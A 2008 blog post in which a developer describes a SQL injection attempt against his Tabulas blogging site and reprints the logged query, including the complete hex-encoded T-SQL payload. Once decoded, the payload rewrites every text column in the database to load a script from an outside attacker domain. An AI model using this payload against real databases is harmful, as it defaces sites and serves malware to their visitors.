hacking tabulas?

September 14, 2008

So during the duration of my Tabulas code refactoring, I've turned on all PHP fatal errors to log to disk, and all mySQL errors to be emailed to me. I got the following interesting error:

SELECT entry_id, entry_userid, entry_url, entry_title, entry_status, entry_created, entry_draft, entry_updated, entry_category, entry_comment, entry_iconid, entry_favorite, entry_sticky, entry_watching, entry_reading, entry_listening, entry_mood, entry_feeling, entry_html, entry_nl2br, entry_break, entry_commentcount, entry_related, entry_status_effective FROM entries, entry_metadata WHERE entries.entry_id = entry_metadata.entryid AND entry_userid = '106634' AND entry_status_effective IN (0) AND entry_updated < NOW() AND entry_draft = 0 ORDER BY entry_sticky DESC, entry_updated DESC LIMIT 6 OFFSET 0;DECLARE @S CHAR(4000);SET @S=CAST(
0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);

How interesting! Somebody was using the offset parameter for entries to do an injection attack! However, the GET param looked like junk, till I showed it to Max, who de-hexed it:

This nice little code snippet looped through my whole database, and would update any textual fields with a JS script.

Upon further inspection, the JS code embedded an <IFRAME> which loaded a Chinese page. This page, in turn, had the wonderful code snippet:

I'm running a Mac, but it looks like the JS tries to exploit ActiveX and do something real evil. Good thing I have a shred of competency when it comes to programming!

Posted by roy on September 14, 2008 at 08:44 PM in Web Development, Tabulas | 4 Comments

Related Entries

tokki August 21, 2003
FOAF and plink January 12, 2004
world peace January 28, 2005
quote of the day October 28, 2006
ui: link dialogs for dekiwiki June 22, 2007

Aaron Fulkerson (guest)

Comment posted on September 16th, 2008 at 01:03 PM

That's pretty cool really.

Reply to this comment

aphrodisiac

Comment posted on September 16th, 2008 at 02:38 AM

i can see that you blurred the link, but we could still see it in title bar of your mac.;)

Reply to this comment

sanjuro (guest)

Comment posted on September 15th, 2008 at 01:44 PM

Interesting, but... it was just injected using the GET method and he did manage to append his code to the query? Sounds serious.

That reminds me also I have an error showing up in my profile page: http://sanjuro.tabulas.com/profile (don't pay attention to the rest of the blog, I need to erase everything and rebuild... someday)

Reply to this comment

hapy

Comment posted on September 15th, 2008 at 08:05 AM

yeah, i tried hacking it to see if it was worthy of holding my thoughts in private.

Reply to this comment

Comment with Facebook

Want to comment with Tabulas?. Please login.

About

Categories

hacking tabulas?

Related Entries

Comment with Facebook